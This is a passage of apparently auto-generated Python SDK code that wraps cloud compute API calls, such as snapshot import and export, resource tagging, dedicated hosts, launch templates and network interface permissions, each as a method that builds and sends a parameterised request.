verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def import_snapshot( self, resource_owner_id=None, snapshot_name=None, oss_object=None, region_id=None, oss_bucket=None, resource_owner_account=None, role_name=None, owner_id=None): api_request = APIRequest('ImportSnapshot', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotName": snapshot_name, "OssObject": oss_object, "RegionId": region_id, "OssBucket": oss_bucket, "ResourceOwnerAccount": resource_owner_account, "RoleName": role_name, "OwnerId": owner_id} return self._handle_request(api_request).result def export_snapshot( self, resource_owner_id=None, snapshot_id=None, region_id=None, oss_bucket=None, resource_owner_account=None, role_name=None, owner_id=None): api_request = APIRequest('ExportSnapshot', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SnapshotId": snapshot_id, "RegionId": region_id, "OssBucket": oss_bucket, "ResourceOwnerAccount": resource_owner_account, "RoleName": role_name, "OwnerId": owner_id} return self._handle_request(api_request).result def untag_resources( self, resource_owner_id=None, region_id=None, all_=None, list_of_resource_id=None, resource_owner_account=None, owner_account=None, owner_id=None, resource_type=None, list_of_tag_key=None): api_request = APIRequest('UntagResources', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "All": all_, "ResourceId": list_of_resource_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ResourceType": resource_type, "TagKey": list_of_tag_key} repeat_info = {"ResourceId": ('ResourceId', 'list', 'str', None), "TagKey": ('TagKey', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def tag_resources( self, region_id=None, list_of_tag=None, list_of_resource_id=None, resource_owner_account=None, owner_account=None, owner_id=None, resource_type=None): api_request = APIRequest('TagResources', 'GET', 'http', 'RPC', 'query') api_request._params = { "RegionId": region_id, "Tag": list_of_tag, "ResourceId": list_of_resource_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ResourceType": resource_type} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "ResourceId": ('ResourceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def list_tag_resources( self, resource_owner_id=None, region_id=None, next_token=None, list_of_tag=None, list_of_resource_id=None, resource_owner_account=None, owner_account=None, owner_id=None, resource_type=None): api_request = APIRequest('ListTagResources', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "NextToken": next_token, "Tag": list_of_tag, "ResourceId": list_of_resource_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "ResourceType": resource_type} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "ResourceId": ('ResourceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def accept_inquired_system_event( self, event_id=None, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('AcceptInquiredSystemEvent', 'GET', 'http', 'RPC', 'query') api_request._params = { "EventId": event_id, "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def redeploy_instance( self, resource_owner_id=None, force_stop=None, resource_owner_account=None, owner_account=None, owner_id=None, instance_id=None): api_request = APIRequest('RedeployInstance', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ForceStop": force_stop, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": instance_id} return self._handle_request(api_request).result def unassign_ipv6_addresses( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, network_interface_id=None, list_of_ipv6_address=None): api_request = APIRequest('UnassignIpv6Addresses', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "NetworkInterfaceId": network_interface_id, "Ipv6Address": list_of_ipv6_address} repeat_info = {"Ipv6Address": ('Ipv6Address', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def assign_ipv6_addresses( self, resource_owner_id=None, region_id=None, resource_owner_account=None, ipv6_address_count=None, owner_account=None, owner_id=None, network_interface_id=None, list_of_ipv6_address=None): api_request = APIRequest('AssignIpv6Addresses', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "Ipv6AddressCount": ipv6_address_count, "OwnerAccount": owner_account, "OwnerId": owner_id, "NetworkInterfaceId": network_interface_id, "Ipv6Address": list_of_ipv6_address} repeat_info = {"Ipv6Address": ('Ipv6Address', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_instance_topology( self, resource_owner_id=None, resource_owner_account=None, region_id=None, instance_ids=None, owner_id=None): api_request = APIRequest('DescribeInstanceTopology', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "InstanceIds": instance_ids, "OwnerId": owner_id} return self._handle_request(api_request).result def renew_dedicated_hosts( self, dedicated_host_ids=None, resource_owner_id=None, client_token=None, region_id=None, period=None, resource_owner_account=None, owner_account=None, owner_id=None, period_unit=None): api_request = APIRequest('RenewDedicatedHosts', 'GET', 'http', 'RPC', 'query') api_request._params = { "DedicatedHostIds": dedicated_host_ids, "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "RegionId": region_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "PeriodUnit": period_unit} return self._handle_request(api_request).result def release_dedicated_host( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, dedicated_host_id=None, owner_id=None): api_request = APIRequest('ReleaseDedicatedHost', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DedicatedHostId": dedicated_host_id, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_instance_deployment( self, resource_owner_id=None, region_id=None, deployment_set_id=None, resource_owner_account=None, owner_account=None, tenancy=None, dedicated_host_id=None, owner_id=None, instance_id=None, force=None, migration_type=None, affinity=None): api_request = APIRequest('ModifyInstanceDeployment', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "DeploymentSetId": deployment_set_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Tenancy": tenancy, "DedicatedHostId": dedicated_host_id, "OwnerId": owner_id, "InstanceId": instance_id, "Force": force, "MigrationType": migration_type, "Affinity": affinity} return self._handle_request(api_request).result def modify_dedicated_host_auto_renew_attribute( self, duration=None, dedicated_host_ids=None, resource_owner_id=None, period_unit=None, auto_renew=None, resource_owner_account=None, region_id=None, owner_account=None, renewal_status=None, owner_id=None): api_request = APIRequest('ModifyDedicatedHostAutoRenewAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "Duration": duration, "DedicatedHostIds": dedicated_host_ids, "ResourceOwnerId": resource_owner_id, "PeriodUnit": period_unit, "AutoRenew": auto_renew, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "RenewalStatus": renewal_status, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_dedicated_host_auto_release_time( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, auto_release_time=None, dedicated_host_id=None, owner_id=None): api_request = APIRequest('ModifyDedicatedHostAutoReleaseTime', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "AutoReleaseTime": auto_release_time, "DedicatedHostId": dedicated_host_id, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_dedicated_host_attribute( self, resource_owner_id=None, description=None, region_id=None, action_on_maintenance=None, dedicated_host_name=None, resource_owner_account=None, owner_account=None, dedicated_host_id=None, owner_id=None, network_attributes_slb_udp_timeout=None, auto_placement=None, network_attributes_udp_timeout=None): api_request = APIRequest('ModifyDedicatedHostAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Description": description, "RegionId": region_id, "ActionOnMaintenance": action_on_maintenance, "DedicatedHostName": dedicated_host_name, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DedicatedHostId": dedicated_host_id, "OwnerId": owner_id, "NetworkAttributes.SlbUdpTimeout": network_attributes_slb_udp_timeout, "AutoPlacement": auto_placement, "NetworkAttributes.UdpTimeout": network_attributes_udp_timeout} return self._handle_request(api_request).result def describe_dedicated_hosts( self, dedicated_host_ids=None, resource_owner_id=None, dedicated_host_name=None, resource_owner_account=None, owner_account=None, owner_id=None, page_number=None, resource_group_id=None, lock_reason=None, region_id=None, page_size=None, zone_id=None, dedicated_host_type=None, list_of_tag=None, status=None): api_request = APIRequest('DescribeDedicatedHosts', 'GET', 'http', 'RPC', 'query') api_request._params = { "DedicatedHostIds": dedicated_host_ids, "ResourceOwnerId": resource_owner_id, "DedicatedHostName": dedicated_host_name, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "PageNumber": page_number, "ResourceGroupId": resource_group_id, "LockReason": lock_reason, "RegionId": region_id, "PageSize": page_size, "ZoneId": zone_id, "DedicatedHostType": dedicated_host_type, "Tag": list_of_tag, "Status": status} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_dedicated_host_types( self, resource_owner_id=None, supported_instance_type_family=None, region_id=None, dedicated_host_type=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeDedicatedHostTypes', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SupportedInstanceTypeFamily": supported_instance_type_family, "RegionId": region_id, "DedicatedHostType": dedicated_host_type, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_dedicated_host_auto_renew( self, dedicated_host_ids=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeDedicatedHostAutoRenew', 'GET', 'http', 'RPC', 'query') api_request._params = { "DedicatedHostIds": dedicated_host_ids, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def allocate_dedicated_hosts( self, resource_owner_id=None, client_token=None, description=None, resource_group_id=None, region_id=None, action_on_maintenance=None, list_of_tag=None, dedicated_host_type=None, auto_renew_period=None, period=None, quantity=None, dedicated_host_name=None, resource_owner_account=None, owner_account=None, auto_release_time=None, owner_id=None, period_unit=None, auto_renew=None, network_attributes_slb_udp_timeout=None, zone_id=None, auto_placement=None, charge_type=None, network_attributes_udp_timeout=None): api_request = APIRequest('AllocateDedicatedHosts', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "Description": description, "ResourceGroupId": resource_group_id, "RegionId": region_id, "ActionOnMaintenance": action_on_maintenance, "Tag": list_of_tag, "DedicatedHostType": dedicated_host_type, "AutoRenewPeriod": auto_renew_period, "Period": period, "Quantity": quantity, "DedicatedHostName": dedicated_host_name, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "AutoReleaseTime": auto_release_time, "OwnerId": owner_id, "PeriodUnit": period_unit, "AutoRenew": auto_renew, "NetworkAttributes.SlbUdpTimeout": network_attributes_slb_udp_timeout, "ZoneId": zone_id, "AutoPlacement": auto_placement, "ChargeType": charge_type, "NetworkAttributes.UdpTimeout": network_attributes_udp_timeout} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_simulated_system_events( self, resource_owner_id=None, not_before=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_instance_id=None, event_type=None): api_request = APIRequest('CreateSimulatedSystemEvents', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "NotBefore": not_before, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": list_of_instance_id, "EventType": event_type} repeat_info = {"InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def cancel_simulated_system_events( self, list_of_event_id=None, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('CancelSimulatedSystemEvents', 'GET', 'http', 'RPC', 'query') api_request._params = { "EventId": list_of_event_id, "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} repeat_info = {"EventId": ('EventId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_eni_monitor_data( self, resource_owner_id=None, start_time=None, region_id=None, period=None, resource_owner_account=None, owner_account=None, end_time=None, owner_id=None, instance_id=None, eni_id=None): api_request = APIRequest('DescribeEniMonitorData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "StartTime": start_time, "RegionId": region_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "OwnerId": owner_id, "InstanceId": instance_id, "EniId": eni_id} return self._handle_request(api_request).result def describe_account_attributes( self, resource_owner_id=None, list_of_attribute_name=None, region_id=None, resource_owner_account=None, owner_id=None, zone_id=None): api_request = APIRequest('DescribeAccountAttributes', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "AttributeName": list_of_attribute_name, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerId": owner_id, "ZoneId": zone_id} repeat_info = {"AttributeName": ('AttributeName', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_launch_template_default_version( self, launch_template_name=None, resource_owner_id=None, region_id=None, launch_template_id=None, resource_owner_account=None, owner_account=None, owner_id=None, default_version_number=None): api_request = APIRequest('ModifyLaunchTemplateDefaultVersion', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "LaunchTemplateId": launch_template_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "DefaultVersionNumber": default_version_number} return self._handle_request(api_request).result def describe_launch_templates( self, list_of_launch_template_name=None, resource_owner_id=None, page_number=None, region_id=None, page_size=None, list_of_template_tag=None, list_of_launch_template_id=None, resource_owner_account=None, owner_account=None, template_resource_group_id=None, owner_id=None): api_request = APIRequest('DescribeLaunchTemplates', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": list_of_launch_template_name, "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "TemplateTag": list_of_template_tag, "LaunchTemplateId": list_of_launch_template_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "TemplateResourceGroupId": template_resource_group_id, "OwnerId": owner_id} repeat_info = {"LaunchTemplateName": ('LaunchTemplateName', 'list', 'str', None), "TemplateTag": ('TemplateTag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "LaunchTemplateId": ('LaunchTemplateId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_launch_template_versions( self, launch_template_name=None, max_version=None, resource_owner_id=None, default_version=None, min_version=None, page_number=None, region_id=None, page_size=None, launch_template_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_launch_template_version=None, detail_flag=None): api_request = APIRequest('DescribeLaunchTemplateVersions', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "MaxVersion": max_version, "ResourceOwnerId": resource_owner_id, "DefaultVersion": default_version, "MinVersion": min_version, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "LaunchTemplateId": launch_template_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "LaunchTemplateVersion": list_of_launch_template_version, "DetailFlag": detail_flag} repeat_info = {"LaunchTemplateVersion": ('LaunchTemplateVersion', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_launch_template_version( self, launch_template_name=None, resource_owner_id=None, list_of_delete_version=None, region_id=None, launch_template_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteLaunchTemplateVersion', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "ResourceOwnerId": resource_owner_id, "DeleteVersion": list_of_delete_version, "RegionId": region_id, "LaunchTemplateId": launch_template_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} repeat_info = {"DeleteVersion": ('DeleteVersion', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_launch_template( self, launch_template_name=None, resource_owner_id=None, region_id=None, launch_template_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteLaunchTemplate', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "LaunchTemplateId": launch_template_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_launch_template_version( self, launch_template_name=None, resource_owner_id=None, security_enhancement_strategy=None, network_type=None, key_pair_name=None, spot_price_limit=None, image_owner_alias=None, resource_group_id=None, host_name=None, system_disk_iops=None, list_of_tag=None, period=None, launch_template_id=None, owner_id=None, vswitch_id=None, spot_strategy=None, instance_name=None, internet_charge_type=None, zone_id=None, internet_max_bandwidth_in=None, version_description=None, image_id=None, io_optimized=None, security_group_id=None, internet_max_bandwidth_out=None, description=None, system_disk_category=None, user_data=None, password_inherit=None, region_id=None, instance_type=None, instance_charge_type=None, enable_vm_os_config=None, list_of_network_interface=None, resource_owner_account=None, owner_account=None, system_disk_disk_name=None, ram_role_name=None, auto_release_time=None, spot_duration=None, list_of_data_disk=None, system_disk_size=None, vpc_id=None, system_disk_description=None): api_request = APIRequest('CreateLaunchTemplateVersion', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "ResourceOwnerId": resource_owner_id, "SecurityEnhancementStrategy": security_enhancement_strategy, "NetworkType": network_type, "KeyPairName": key_pair_name, "SpotPriceLimit": spot_price_limit, "ImageOwnerAlias": image_owner_alias, "ResourceGroupId": resource_group_id, "HostName": host_name, "SystemDisk.Iops": system_disk_iops, "Tag": list_of_tag, "Period": period, "LaunchTemplateId": launch_template_id, "OwnerId": owner_id, "VSwitchId": vswitch_id, "SpotStrategy": spot_strategy, "InstanceName": instance_name, "InternetChargeType": internet_charge_type, "ZoneId": zone_id, "InternetMaxBandwidthIn": internet_max_bandwidth_in, "VersionDescription": version_description, "ImageId": image_id, "IoOptimized": io_optimized, "SecurityGroupId": security_group_id, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "Description": description, "SystemDisk.Category": system_disk_category, "UserData": user_data, "PasswordInherit": password_inherit, "RegionId": region_id, "InstanceType": instance_type, "InstanceChargeType": instance_charge_type, "EnableVmOsConfig": enable_vm_os_config, "NetworkInterface": list_of_network_interface, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SystemDisk.DiskName": system_disk_disk_name, "RamRoleName": ram_role_name, "AutoReleaseTime": auto_release_time, "SpotDuration": spot_duration, "DataDisk": list_of_data_disk, "SystemDisk.Size": system_disk_size, "VpcId": vpc_id, "SystemDisk.Description": system_disk_description} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "NetworkInterface": ('NetworkInterface', 'list', 'dict', [('PrimaryIpAddress', 'str', None, None), ('VSwitchId', 'str', None, None), ('SecurityGroupId', 'str', None, None), ('NetworkInterfaceName', 'str', None, None), ('Description', 'str', None, None), ]), "DataDisk": ('DataDisk', 'list', 'dict', [('Size', 'str', None, None), ('SnapshotId', 'str', None, None), ('Category', 'str', None, None), ('Encrypted', 'str', None, None), ('DiskName', 'str', None, None), ('Description', 'str', None, None), ('DeleteWithInstance', 'str', None, None), ('Device', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def create_launch_template( self, launch_template_name=None, resource_owner_id=None, security_enhancement_strategy=None, network_type=None, key_pair_name=None, spot_price_limit=None, image_owner_alias=None, resource_group_id=None, host_name=None, system_disk_iops=None, list_of_template_tag=None, list_of_tag=None, period=None, template_resource_group_id=None, owner_id=None, vswitch_id=None, spot_strategy=None, instance_name=None, internet_charge_type=None, zone_id=None, internet_max_bandwidth_in=None, version_description=None, image_id=None, io_optimized=None, security_group_id=None, internet_max_bandwidth_out=None, description=None, system_disk_category=None, user_data=None, password_inherit=None, region_id=None, instance_type=None, instance_charge_type=None, enable_vm_os_config=None, list_of_network_interface=None, resource_owner_account=None, owner_account=None, system_disk_disk_name=None, ram_role_name=None, auto_release_time=None, spot_duration=None, list_of_data_disk=None, system_disk_size=None, vpc_id=None, system_disk_description=None): api_request = APIRequest('CreateLaunchTemplate', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "ResourceOwnerId": resource_owner_id, "SecurityEnhancementStrategy": security_enhancement_strategy, "NetworkType": network_type, "KeyPairName": key_pair_name, "SpotPriceLimit": spot_price_limit, "ImageOwnerAlias": image_owner_alias, "ResourceGroupId": resource_group_id, "HostName": host_name, "SystemDisk.Iops": system_disk_iops, "TemplateTag": list_of_template_tag, "Tag": list_of_tag, "Period": period, "TemplateResourceGroupId": template_resource_group_id, "OwnerId": owner_id, "VSwitchId": vswitch_id, "SpotStrategy": spot_strategy, "InstanceName": instance_name, "InternetChargeType": internet_charge_type, "ZoneId": zone_id, "InternetMaxBandwidthIn": internet_max_bandwidth_in, "VersionDescription": version_description, "ImageId": image_id, "IoOptimized": io_optimized, "SecurityGroupId": security_group_id, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "Description": description, "SystemDisk.Category": system_disk_category, "UserData": user_data, "PasswordInherit": password_inherit, "RegionId": region_id, "InstanceType": instance_type, "InstanceChargeType": instance_charge_type, "EnableVmOsConfig": enable_vm_os_config, "NetworkInterface": list_of_network_interface, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SystemDisk.DiskName": system_disk_disk_name, "RamRoleName": ram_role_name, "AutoReleaseTime": auto_release_time, "SpotDuration": spot_duration, "DataDisk": list_of_data_disk, "SystemDisk.Size": system_disk_size, "VpcId": vpc_id, "SystemDisk.Description": system_disk_description} repeat_info = {"TemplateTag": ('TemplateTag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "NetworkInterface": ('NetworkInterface', 'list', 'dict', [('PrimaryIpAddress', 'str', None, None), ('VSwitchId', 'str', None, None), ('SecurityGroupId', 'str', None, None), ('NetworkInterfaceName', 'str', None, None), ('Description', 'str', None, None), ]), "DataDisk": ('DataDisk', 'list', 'dict', [('Size', 'str', None, None), ('SnapshotId', 'str', None, None), ('Category', 'str', None, None), ('Encrypted', 'str', None, None), ('DiskName', 'str', None, None), ('Description', 'str', None, None), ('DeleteWithInstance', 'str', None, None), ('Device', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def install_cloud_assistant( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_instance_id=None): api_request = APIRequest('InstallCloudAssistant', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": list_of_instance_id} repeat_info = {"InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_cloud_assistant_status( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_instance_id=None): api_request = APIRequest('DescribeCloudAssistantStatus', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": list_of_instance_id} repeat_info = {"InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def unassign_private_ip_addresses( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_private_ip_address=None, network_interface_id=None): api_request = APIRequest('UnassignPrivateIpAddresses', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "PrivateIpAddress": list_of_private_ip_address, "NetworkInterfaceId": network_interface_id} repeat_info = {"PrivateIpAddress": ('PrivateIpAddress', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def assign_private_ip_addresses( self, resource_owner_id=None, secondary_private_ip_address_count=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_private_ip_address=None, network_interface_id=None): api_request = APIRequest('AssignPrivateIpAddresses', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SecondaryPrivateIpAddressCount": secondary_private_ip_address_count, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "PrivateIpAddress": list_of_private_ip_address, "NetworkInterfaceId": network_interface_id} repeat_info = {"PrivateIpAddress": ('PrivateIpAddress', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_network_interface_permissions( self, resource_owner_id=None, page_number=None, region_id=None, page_size=None, list_of_network_interface_permission_id=None, resource_owner_account=None, owner_account=None, owner_id=None, network_interface_id=None): api_request = APIRequest('DescribeNetworkInterfacePermissions', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "NetworkInterfacePermissionId": list_of_network_interface_permission_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "NetworkInterfaceId": network_interface_id} repeat_info = { "NetworkInterfacePermissionId": ( 'NetworkInterfacePermissionId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_network_interface_permission( self, resource_owner_id=None, region_id=None, network_interface_permission_id=None, resource_owner_account=None, owner_account=None, owner_id=None, force=None): api_request = APIRequest('DeleteNetworkInterfacePermission', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "NetworkInterfacePermissionId": network_interface_permission_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "Force": force} return self._handle_request(api_request).result def create_network_interface_permission( self, resource_owner_id=None, account_id=None, region_id=None, resource_owner_account=None, owner_account=None, permission=None, owner_id=None, network_interface_id=None): api_request = APIRequest('CreateNetworkInterfacePermission', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "AccountId": account_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Permission": permission, "OwnerId": owner_id, "NetworkInterfaceId": network_interface_id} return self._handle_request(api_request).result def get_instance_screenshot( self, resource_owner_id=None, region_id=None, resource_owner_account=None, wake_up=None, owner_account=None, owner_id=None, instance_id=None): api_request = APIRequest('GetInstanceScreenshot', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "WakeUp": wake_up, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": instance_id} return self._handle_request(api_request).result def get_instance_console_output( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, instance_id=None): api_request = APIRequest('GetInstanceConsoleOutput', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": instance_id} return self._handle_request(api_request).result def describe_resources_modification( self, resource_owner_id=None, memory=None, cores=None, region_id=None, migrate_across_zone=None, instance_type=None, resource_id=None, resource_owner_account=None, owner_account=None, operation_type=None, owner_id=None, destination_resource=None): api_request = APIRequest('DescribeResourcesModification', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": 